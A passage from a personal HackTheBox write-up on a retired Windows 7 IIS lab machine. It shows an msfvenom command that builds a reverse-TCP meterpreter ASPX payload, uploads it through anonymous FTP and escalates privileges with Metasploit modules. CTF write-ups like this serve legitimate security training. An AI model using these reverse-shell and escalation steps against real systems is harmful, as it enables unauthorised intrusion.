This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Machine IP: 10.10.10.5
As always, I start enumeration with AutoRecon. The open ports are TCP/21 and TCP/80. While AutoRecon continues scanning, I look into the FTP server. It allows anonymous login! I note that in my mind map and leave it for now to check on the results of AutoRecon.
I look at what the nmap HTTP script scan found:
At the bottom of the results, I see a CVE was found:
I see this CVE is tied to MS-15-034 and run that through searchsploit:
I take a look at the C exploit:
I see that the main body of the payload is simply running a validation on whether the target is vulnerable to this CVE.
Well, that would still be useful so let’s compile and execute the code:
Great. Now what?
I back off and take another look at my enumeration results. I know this is a Windows machine because the server at TCP/80 is running IIS. I know it has a CVE. I know that I have anonymous access via FTP to the server, to a directory that appears to host the web server’s files.
Let’s generate a reverse TCP meterpreter payload with msfvenom, push it to the target via FTP, then call it from the web server to execute and establish a shell back to my box.
The payload command is:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.33 LPORT=4444 -f aspx > devel.aspx
Substitute the LHOST and LPORT as applicable for your system.
I can now push the file via FTP with
ftp 10.10.10.5 # anonymous login > put ./devel.aspx
Then I need to start a meterpreter handler on my machine listening on LPORT.
sudo msfconsole msf> workspace htb msf> use windows/meterpreter/reverse_tcp
I just need to set my local IP:
Then I can set up a local listener by converting this to a handler:
I can now execute my payload with a curl command:
Meterpreter records the session (ignore the
whoami -> root command, I was confused on what terminal I was in):
I can now connect to the session I’ve created:
Now let’s gather information on the system and check what user I am:
Ok, this is a Windows 7 machine with x86 architecture. I am logged in as the IIS user, which isn’t going to give me
much. I can’t even write to my current directory. But, I should be able to write to
C:\Windows\TEMP. I navigate
over to there and then use
local_exploit_suggestor to suggest some exploit modules I can run to elevate my shell
The machine seems to be vulnerable to
exploit/windows/local/bypassuac_eventvwr - let’s try that.
It is unsuccessful, as my IIS user isn’t in the Administrators group. On to the next.
The second exploit,
exploit/windows/local/ms10_015_kitrap0d is successful.
I can now go and retrieve the user and root flags.